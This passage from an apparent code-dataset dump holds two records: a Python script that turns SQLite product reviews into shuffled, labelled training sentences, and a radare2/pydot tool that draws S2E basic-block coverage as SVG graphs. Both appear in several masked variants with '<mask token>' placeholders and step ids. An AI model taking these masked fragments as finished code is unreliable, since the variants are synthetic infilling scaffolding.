parser.add_argument('--min_sent_size', type=int, default=5)
parser.add_argument('--buff_size', type=int, default=1000000)
args = parser.parse_args()
main(args)
<|reserved_special_token_1|>
import sqlite3
from random import shuffle
import argparse
def wordCount(db):
    """Count how often each word occurs across all review sentences in *db*."""
    counts = {}
    for tokens, _labels in iterReviews(db):
        for token in tokens:
            counts[token] = counts.get(token, 0) + 1
    return counts
def filterWords(words, min_count=0):
    """Return the set of words whose count in *words* is at least *min_count*."""
    return {word for word, count in words.items() if count >= min_count}
def iterReviews(db):
    """Yield (tokens, labels) pairs for every sentence of every training review.

    Opens the SQLite database at *db* and iterates the rows of ``reviews``
    where ``test`` is false.  Each review text is split on '.' into
    sentences; sentences shorter than two characters are dropped.  For each
    remaining sentence this yields its whitespace-split tokens together with
    three labels: the user ('u_<name>'), the item ('i_<id>') and the rating
    ('r_<rating>').
    """
    con = sqlite3.connect(db)
    try:
        c = con.cursor()
        for pid, uname, rev, rating in c.execute(
            'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'
        ):
            # Skip rows with any missing field.
            if pid is None or uname is None or rating is None or rev is None:
                continue
            for sent in rev.split('.'):
                if len(sent) < 2:
                    continue
                yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.format(pid), 'r_{}'.format(rating)]
    finally:
        # Runs when the generator is exhausted or closed, so the database
        # handle is released (the original never closed the connection).
        con.close()
def main(args):
    """Write shuffled '<label> <sentence>' training lines to args.output.

    Builds the vocabulary (words seen at least args.min_count times in the
    database), then emits one line per (label, sentence) pair for every
    sentence that keeps at least args.min_sent_size in-vocabulary words.
    Lines are shuffled and flushed in chunks of args.buff_size so the output
    file is locally randomized.
    """
    buff = []
    i = 0  # lines written so far (one line per label per sentence)
    words = filterWords(wordCount(args.db), min_count=args.min_count)
    # 'with' guarantees the output file is closed even if iteration fails
    # (the original leaked the handle on any exception).
    with open(args.output, 'w', encoding='utf-8') as f:
        for sent, labels in iterReviews(args.db):
            # Drop out-of-vocabulary words, then skip sentences left too short.
            sent = [word for word in sent if word in words]
            if len(sent) < args.min_sent_size:
                continue
            for label in labels:
                buff.append('{} {}\n'.format(label, ' '.join(sent)))
                i += 1
                if len(buff) >= args.buff_size:
                    # Flush a shuffled chunk to disk and start a fresh buffer.
                    shuffle(buff)
                    for se in buff:
                        f.write(se)
                    buff = []
                    print('wrote {} sentences'.format(i))
        # Flush whatever remains in the last (partial) buffer.
        shuffle(buff)
        for se in buff:
            f.write(se)
    print('wrote {} sentences'.format(i))
# Command-line interface for building the labelled-sentence training file.
parser = argparse.ArgumentParser()
# Path to the SQLite database holding the 'reviews' table.
parser.add_argument('db', type=str)
# Output text file.  NOTE(review): the default here is inert -- positional
# arguments without nargs='?' are always required by argparse.
parser.add_argument('output', type=str, default='sentences.txt')
# Words seen fewer than this many times are dropped from the vocabulary.
parser.add_argument('--min_count', type=int, default=100)
# Sentences with fewer surviving words than this are skipped.
parser.add_argument('--min_sent_size', type=int, default=5)
# Number of lines to accumulate before shuffling and flushing to disk.
parser.add_argument('--buff_size', type=int, default=1000000)
args = parser.parse_args()
main(args)
<|reserved_special_token_1|>
#coding: utf8
import sqlite3
from random import shuffle
import argparse
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
def iterReviews(db):
con = sqlite3.connect(db)
c = con.cursor()
i = 0
for pid, uname, rev, rating in c.execute('SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'):
if pid is None or uname is None or rating is None or rev is None:
continue
else:
for sent in rev.split("."):
if len(sent) < 2:
continue
else:
yield (sent.split(" "), ['u_{}'.format(uname),'i_{}'.format(pid), 'r_{}'.format(rating)])
i += 1
def main(args):
f = open(args.output, "w",encoding="utf-8")
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append("{} {}\n".format(label, " ".join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print("wrote {} sentences".format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print("wrote {} sentences".format(i))
parser = argparse.ArgumentParser()
parser.add_argument("db", type=str)
parser.add_argument("output", type=str, default="sentences.txt")
parser.add_argument("--min_count", type=int, default=100)
parser.add_argument("--min_sent_size", type=int, default=5)
parser.add_argument("--buff_size", type=int, default=1000000)
args = parser.parse_args()
main(args)
|
flexible
|
{
"blob_id": "04867e8911f7cb30af6cefb7ba7ff34d02a07891",
"index": 7970,
"step-1": "<mask token>\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\n<mask token>\n\n\ndef main(args):\n f = open(args.output, 'w', encoding='utf-8')\n buff = []\n i = 0\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n for sent, labels in iterReviews(args.db):\n sent = [word for word in sent if word in words]\n if len(sent) < args.min_sent_size:\n continue\n for label in labels:\n buff.append('{} {}\\n'.format(label, ' '.join(sent)))\n i += 1\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print('wrote {} sentences'.format(i))\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n print('wrote {} sentences'.format(i))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\ndef iterReviews(db):\n con = sqlite3.connect(db)\n c = con.cursor()\n i = 0\n for pid, uname, rev, rating in c.execute(\n 'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'\n ):\n if pid is None or uname is None or rating is None or rev is None:\n continue\n else:\n for sent in rev.split('.'):\n if len(sent) < 2:\n continue\n else:\n yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.\n format(pid), 'r_{}'.format(rating)]\n i += 1\n\n\ndef main(args):\n f = open(args.output, 'w', encoding='utf-8')\n buff = []\n i = 0\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n for sent, labels in iterReviews(args.db):\n sent = [word for word in sent if word in words]\n if len(sent) < args.min_sent_size:\n continue\n for label in labels:\n buff.append('{} {}\\n'.format(label, ' '.join(sent)))\n i += 1\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print('wrote {} sentences'.format(i))\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n print('wrote {} sentences'.format(i))\n\n\n<mask token>\nparser.add_argument('db', type=str)\nparser.add_argument('output', type=str, default='sentences.txt')\nparser.add_argument('--min_count', type=int, default=100)\nparser.add_argument('--min_sent_size', type=int, default=5)\nparser.add_argument('--buff_size', type=int, default=1000000)\n<mask token>\nmain(args)\n",
"step-3": "<mask token>\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\ndef iterReviews(db):\n con = sqlite3.connect(db)\n c = con.cursor()\n i = 0\n for pid, uname, rev, rating in c.execute(\n 'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'\n ):\n if pid is None or uname is None or rating is None or rev is None:\n continue\n else:\n for sent in rev.split('.'):\n if len(sent) < 2:\n continue\n else:\n yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.\n format(pid), 'r_{}'.format(rating)]\n i += 1\n\n\ndef main(args):\n f = open(args.output, 'w', encoding='utf-8')\n buff = []\n i = 0\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n for sent, labels in iterReviews(args.db):\n sent = [word for word in sent if word in words]\n if len(sent) < args.min_sent_size:\n continue\n for label in labels:\n buff.append('{} {}\\n'.format(label, ' '.join(sent)))\n i += 1\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print('wrote {} sentences'.format(i))\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n print('wrote {} sentences'.format(i))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('db', type=str)\nparser.add_argument('output', type=str, default='sentences.txt')\nparser.add_argument('--min_count', type=int, default=100)\nparser.add_argument('--min_sent_size', type=int, default=5)\nparser.add_argument('--buff_size', type=int, default=1000000)\nargs = parser.parse_args()\nmain(args)\n",
"step-4": "import sqlite3\nfrom random import shuffle\nimport argparse\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\ndef iterReviews(db):\n con = sqlite3.connect(db)\n c = con.cursor()\n i = 0\n for pid, uname, rev, rating in c.execute(\n 'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'\n ):\n if pid is None or uname is None or rating is None or rev is None:\n continue\n else:\n for sent in rev.split('.'):\n if len(sent) < 2:\n continue\n else:\n yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.\n format(pid), 'r_{}'.format(rating)]\n i += 1\n\n\ndef main(args):\n f = open(args.output, 'w', encoding='utf-8')\n buff = []\n i = 0\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n for sent, labels in iterReviews(args.db):\n sent = [word for word in sent if word in words]\n if len(sent) < args.min_sent_size:\n continue\n for label in labels:\n buff.append('{} {}\\n'.format(label, ' '.join(sent)))\n i += 1\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print('wrote {} sentences'.format(i))\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n print('wrote {} sentences'.format(i))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('db', type=str)\nparser.add_argument('output', type=str, default='sentences.txt')\nparser.add_argument('--min_count', type=int, default=100)\nparser.add_argument('--min_sent_size', type=int, default=5)\nparser.add_argument('--buff_size', type=int, default=1000000)\nargs = parser.parse_args()\nmain(args)\n",
"step-5": "#coding: utf8\n\nimport sqlite3\nfrom random import shuffle\nimport argparse\n\n\ndef wordCount(db):\n words = {}\n for sent, labels in iterReviews(db):\n for word in sent:\n if word not in words:\n words[word] = 1\n else:\n words[word] += 1\n return words\n\n\ndef filterWords(words, min_count=0):\n return set(word for word in words if words[word] >= min_count)\n\n\ndef iterReviews(db):\n con = sqlite3.connect(db)\n c = con.cursor()\n i = 0\n\n for pid, uname, rev, rating in c.execute('SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'):\n if pid is None or uname is None or rating is None or rev is None:\n continue\n else:\n for sent in rev.split(\".\"):\n if len(sent) < 2:\n continue\n else:\n yield (sent.split(\" \"), ['u_{}'.format(uname),'i_{}'.format(pid), 'r_{}'.format(rating)])\n i += 1\n\n\ndef main(args):\n f = open(args.output, \"w\",encoding=\"utf-8\")\n buff = []\n i = 0\n\n words = filterWords(wordCount(args.db), min_count=args.min_count)\n\n for sent, labels in iterReviews(args.db):\n\n sent = [word for word in sent if word in words]\n\n if len(sent) < args.min_sent_size:\n continue\n\n for label in labels:\n buff.append(\"{} {}\\n\".format(label, \" \".join(sent)))\n i += 1\n\n if len(buff) >= args.buff_size:\n shuffle(buff)\n for se in buff:\n f.write(se)\n buff = []\n print(\"wrote {} sentences\".format(i))\n\n shuffle(buff)\n for se in buff:\n f.write(se)\n f.close()\n\n print(\"wrote {} sentences\".format(i))\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"db\", type=str)\nparser.add_argument(\"output\", type=str, default=\"sentences.txt\")\nparser.add_argument(\"--min_count\", type=int, default=100)\nparser.add_argument(\"--min_sent_size\", type=int, default=5)\nparser.add_argument(\"--buff_size\", type=int, default=1000000)\nargs = parser.parse_args()\n\nmain(args)\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
"""
Copyright (C) Adrian Herrera, 2017
You will need to install r2pipe and pydot:
```
pip install r2pipe pydot
```
"""
from __future__ import print_function
import glob
import json
import os
import pydot
import r2pipe
import s2e_web.S2E_settings as S2E_settings
def function_addrs(r2):
    """Yield the start address (as an int) of every function radare2 lists.

    'aflqj' returns the analysed function addresses as hex strings.
    """
    yield from (int(addr, 16) for addr in r2.cmdj('aflqj'))
def parse_tb_file(path, module):
    """
    Parse a translation block coverage file generated by S2E's
    ``TranslationBlockCoverage`` plugin.

    Returns the list of translation blocks recorded for ``module``, or
    ``None`` (after printing a warning) when the file is unparsable, empty,
    or does not mention the module.
    """
    # JSON is UTF-8 by specification; be explicit instead of relying on the
    # platform's default encoding (the original omitted this).
    with open(path, 'r', encoding='utf-8') as f:
        try:
            tb_coverage_data = json.load(f)
        except Exception:
            # Best-effort: a corrupt coverage file must not abort the run.
            print('WARN: Failed to parse translation block JSON file %s' % path)
            return None

    if not tb_coverage_data:
        print('WARN: Translation block JSON file %s is empty' % path)
        return None

    if module not in tb_coverage_data:
        print('WARN: Target %s not found in translation block JSON file %s' %
              (module, path))
        return None

    return tb_coverage_data[module]
def basic_block_coverage(r2, translation_blocks):
    """
    Calculate the basic block coverage based on the covered TBs.

    ``translation_blocks`` is an iterable of ``(start_addr, end_addr)``
    pairs recorded by S2E.  Returns a set of *covered* basic block start
    addresses.
    """
    covered_bbs = set()
    for func_addr in function_addrs(r2):
        # 'agj' returns the function's control-flow graph as JSON; exactly
        # one graph is expected per function address.
        graph = r2.cmdj('agj 0x%x' % func_addr)
        assert len(graph) == 1
        graph = graph[0]

        for tb_start_addr, tb_end_addr in translation_blocks:
            for bb in graph['blocks']:
                bb_start_addr = bb['offset']
                # NOTE(review): offset + size is used as the block's end and
                # the comparisons below are inclusive on both bounds, so
                # exactly-adjacent ranges also count as overlapping --
                # confirm against S2E's TB address convention.
                bb_end_addr = bb_start_addr + bb['size']

                # Check if the translation block falls within a basic block OR
                # a basic block falls within a translation block
                if (bb_end_addr >= tb_start_addr >= bb_start_addr or
                    bb_start_addr <= tb_end_addr <= bb_end_addr):
                    covered_bbs.add(bb_start_addr)

    return covered_bbs
def render_functions(r2, covered_bbs, output_dir):
    """
    Renders SVG graphs of each of the functions in the program. Basic blocks
    that were executed by S2E are coloured green.

    The resulting SVG images are written to `output_dir`, one file per
    function, named ``<function>_0x<addr>.svg``.
    """
    for func_addr in function_addrs(r2):
        # Get the function name
        func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']

        # 'ag' emits the function graph in Graphviz dot format.
        dot_str = r2.cmd('ag 0x%x' % func_addr)
        dot = pydot.graph_from_dot_data(dot_str)
        if not dot:
            # radare2 produced no parsable graph for this function.
            continue
        else:
            dot = dot[0]

        for node in dot.get_nodes():
            node_name = node.get_name()
            try:
                # XXX This is very hacky - need something more robust
                # pydot keeps the surrounding quotes from the dot source;
                # strip them before interpreting the name as an address.
                if node_name.startswith('"'):
                    node_name = node_name[1:-1]
                node_addr = int(node_name, 16)
            except ValueError:
                # Node name is not a hex string
                continue

            if node_addr in covered_bbs:
                # Highlight basic blocks that S2E actually executed.
                node.set_fillcolor('darkolivegreen2')

        svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name, func_addr))
        with open(svg_path, 'wb') as f:
            svg = dot.create_svg()
            f.write(svg)
def generate_graph(s2e_output_dir, s2e_num, project_name):
    """
    Generate the SVG coverage graphs for the analysis in `s2e_output_dir`.

    Args:
        s2e_output_dir: Directory that will receive a ``functions``
            subdirectory full of rendered SVGs.
        s2e_num: The numeric suffix of the ``s2e-out-N`` directory, used only
            to build the relative paths returned to the caller.
        project_name: Name of the S2E project (assumed to match the target
            binary's name -- see the XXX notes below).

    Returns:
        A list of ``[function_name, relative_svg_path]`` pairs on success, or
        ``None`` if any sanity check fails (an ERROR message is printed).
    """
    s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH
    output_dir = os.path.join(s2e_output_dir, 'functions')

    # Check that the given S2E environment is legitimate
    if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):
        print('ERROR: %s is not an S2E environment' % s2e_env_path)
        return

    # Check that the given project exists in the environment
    project_path = os.path.join(s2e_env_path, 'projects', project_name)
    if not os.path.isdir(project_path):
        print('ERROR: %s is not a valid project' % project_name)
        return

    # Check that the project has been executed at least once
    s2e_last_path = os.path.join(project_path, 's2e-last')
    if not os.path.isdir(s2e_last_path):
        print('ERROR: %s has no s2e-last' % project_name)
        return

    # Create the output directory only after the sanity checks pass. The
    # previous version called os.makedirs() unconditionally up front, which
    # raises OSError when the directory already exists and made the later
    # "is a valid output directory" check unreachable dead code.
    if not os.path.isdir(output_dir):
        os.makedirs(output_dir)

    # Get all the TB coverage files (per-state subdirectories and top level)
    tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*', 'tbcoverage-*.json')) + \
                        glob.glob(os.path.join(s2e_last_path, 'tbcoverage-*.json'))
    if not tb_coverage_files:
        print('ERROR: No translation block coverage files found in s2e-last. '
              'Did you enable the ``TranslationBlockCoverage`` plugin in '
              's2e-config.lua?')
        return

    # Parse the TB coverage files and merge the covered address ranges
    covered_tbs = set()
    for tb_coverage_file in tb_coverage_files:
        # XXX A project can have a different name to the target program
        tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)
        if not tb_coverage_data:
            continue

        covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)

    # Open the program in Radare and do the initial analysis
    # XXX A project can have a different name to the target program
    r2 = r2pipe.open(os.path.join(project_path, project_name))
    r2.cmd('aaa')

    # Calculate the basic block coverage and render the information as a set
    # of SVG images for each function
    covered_bbs = basic_block_coverage(r2, covered_tbs)
    render_functions(r2, covered_bbs, output_dir)

    base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')
    return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.listdir(output_dir)]
|
normal
|
{
"blob_id": "2aee4af2e5a5c3f59dde4d9dd46f8d124a32fb27",
"index": 2590,
"step-1": "<mask token>\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\n<mask token>\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or \n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n continue\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name,\n func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\n<mask token>\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or \n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n continue\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name,\n func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\ndef generate_graph(s2e_output_dir, s2e_num, project_name):\n \"\"\"\n Generate the PNG graph for the analysis in the output_dir\n \"\"\"\n s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH\n output_dir = 
os.path.join(s2e_output_dir, 'functions')\n os.makedirs(output_dir)\n if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):\n print('ERROR: %s is not an S2E environment' % s2e_env_path)\n return\n project_path = os.path.join(s2e_env_path, 'projects', project_name)\n if not os.path.isdir(project_path):\n print('ERROR: %s is not a valid project' % project_name)\n return\n if not os.path.isdir(output_dir):\n print('ERROR: %s is not a valid output directory' % output_dir)\n return\n s2e_last_path = os.path.join(project_path, 's2e-last')\n if not os.path.isdir(s2e_last_path):\n print('ERROR: %s has no s2e-last' % project_name)\n return\n tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*',\n 'tbcoverage-*.json')) + glob.glob(os.path.join(s2e_last_path,\n 'tbcoverage-*.json'))\n if not tb_coverage_files:\n print(\n 'ERROR: No translation block coverage files found in s2e-last. Did you enable the ``TranslationBlockCoverage`` plugin in s2e-config.lua?'\n )\n return\n covered_tbs = set()\n for tb_coverage_file in tb_coverage_files:\n tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)\n if not tb_coverage_data:\n continue\n covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)\n r2 = r2pipe.open(os.path.join(project_path, project_name))\n r2.cmd('aaa')\n covered_bbs = basic_block_coverage(r2, covered_tbs)\n render_functions(r2, covered_bbs, output_dir)\n base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')\n return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.\n listdir(output_dir)]\n",
"step-3": "<mask token>\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\ndef parse_tb_file(path, module):\n \"\"\"\n Parse a translation block coverage file generated by S2E's\n ``TranslationBlockCoverage`` plugin.\n \"\"\"\n with open(path, 'r') as f:\n try:\n tb_coverage_data = json.load(f)\n except Exception:\n print('WARN: Failed to parse translation block JSON file %s' % path\n )\n return None\n if not tb_coverage_data:\n print('WARN: Translation block JSON file %s is empty' % path)\n return None\n if module not in tb_coverage_data:\n print('WARN: Target %s not found in translation block JSON file %s' %\n (module, path))\n return None\n return tb_coverage_data[module]\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or \n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. 
Basic blocks\n that were executed by S2E are coloured green.\n\n The resulting SVG images are written to `output_dir`.\n \"\"\"\n for func_addr in function_addrs(r2):\n func_name = r2.cmdj('agj 0x%x' % func_addr)[0]['name']\n dot_str = r2.cmd('ag 0x%x' % func_addr)\n dot = pydot.graph_from_dot_data(dot_str)\n if not dot:\n continue\n else:\n dot = dot[0]\n for node in dot.get_nodes():\n node_name = node.get_name()\n try:\n if node_name.startswith('\"'):\n node_name = node_name[1:-1]\n node_addr = int(node_name, 16)\n except ValueError:\n continue\n if node_addr in covered_bbs:\n node.set_fillcolor('darkolivegreen2')\n svg_path = os.path.join(output_dir, '%s_0x%x.svg' % (func_name,\n func_addr))\n with open(svg_path, 'wb') as f:\n svg = dot.create_svg()\n f.write(svg)\n\n\ndef generate_graph(s2e_output_dir, s2e_num, project_name):\n \"\"\"\n Generate the PNG graph for the analysis in the output_dir\n \"\"\"\n s2e_env_path = S2E_settings.S2E_ENVIRONMENT_FOLDER_PATH\n output_dir = os.path.join(s2e_output_dir, 'functions')\n os.makedirs(output_dir)\n if not os.path.isfile(os.path.join(s2e_env_path, 's2e.yaml')):\n print('ERROR: %s is not an S2E environment' % s2e_env_path)\n return\n project_path = os.path.join(s2e_env_path, 'projects', project_name)\n if not os.path.isdir(project_path):\n print('ERROR: %s is not a valid project' % project_name)\n return\n if not os.path.isdir(output_dir):\n print('ERROR: %s is not a valid output directory' % output_dir)\n return\n s2e_last_path = os.path.join(project_path, 's2e-last')\n if not os.path.isdir(s2e_last_path):\n print('ERROR: %s has no s2e-last' % project_name)\n return\n tb_coverage_files = glob.glob(os.path.join(s2e_last_path, '*',\n 'tbcoverage-*.json')) + glob.glob(os.path.join(s2e_last_path,\n 'tbcoverage-*.json'))\n if not tb_coverage_files:\n print(\n 'ERROR: No translation block coverage files found in s2e-last. 
Did you enable the ``TranslationBlockCoverage`` plugin in s2e-config.lua?'\n )\n return\n covered_tbs = set()\n for tb_coverage_file in tb_coverage_files:\n tb_coverage_data = parse_tb_file(tb_coverage_file, project_name)\n if not tb_coverage_data:\n continue\n covered_tbs.update((start, end) for start, end, _ in tb_coverage_data)\n r2 = r2pipe.open(os.path.join(project_path, project_name))\n r2.cmd('aaa')\n covered_bbs = basic_block_coverage(r2, covered_tbs)\n render_functions(r2, covered_bbs, output_dir)\n base_path = os.path.join(project_name, 's2e-out-%d' % s2e_num, 'functions')\n return [[file_[0:-4], os.path.join(base_path, file_)] for file_ in os.\n listdir(output_dir)]\n",
"step-4": "<mask token>\nfrom __future__ import print_function\nimport glob\nimport json\nimport os\nimport pydot\nimport r2pipe\nimport s2e_web.S2E_settings as S2E_settings\n\n\ndef function_addrs(r2):\n \"\"\"\n Yield a list of all the function's start addresses.\n \"\"\"\n for addr in r2.cmdj('aflqj'):\n yield int(addr, 16)\n\n\ndef parse_tb_file(path, module):\n \"\"\"\n Parse a translation block coverage file generated by S2E's\n ``TranslationBlockCoverage`` plugin.\n \"\"\"\n with open(path, 'r') as f:\n try:\n tb_coverage_data = json.load(f)\n except Exception:\n print('WARN: Failed to parse translation block JSON file %s' % path\n )\n return None\n if not tb_coverage_data:\n print('WARN: Translation block JSON file %s is empty' % path)\n return None\n if module not in tb_coverage_data:\n print('WARN: Target %s not found in translation block JSON file %s' %\n (module, path))\n return None\n return tb_coverage_data[module]\n\n\ndef basic_block_coverage(r2, translation_blocks):\n \"\"\"\n Calculate the basic block coverage based on the covered TBs.\n\n Returns a set of *covered* basic block start addresses\n \"\"\"\n covered_bbs = set()\n for func_addr in function_addrs(r2):\n graph = r2.cmdj('agj 0x%x' % func_addr)\n assert len(graph) == 1\n graph = graph[0]\n for tb_start_addr, tb_end_addr in translation_blocks:\n for bb in graph['blocks']:\n bb_start_addr = bb['offset']\n bb_end_addr = bb_start_addr + bb['size']\n if (bb_end_addr >= tb_start_addr >= bb_start_addr or \n bb_start_addr <= tb_end_addr <= bb_end_addr):\n covered_bbs.add(bb_start_addr)\n return covered_bbs\n\n\ndef render_functions(r2, covered_bbs, output_dir):\n \"\"\"\n Renders SVG graphs of each of the functions in the program. 
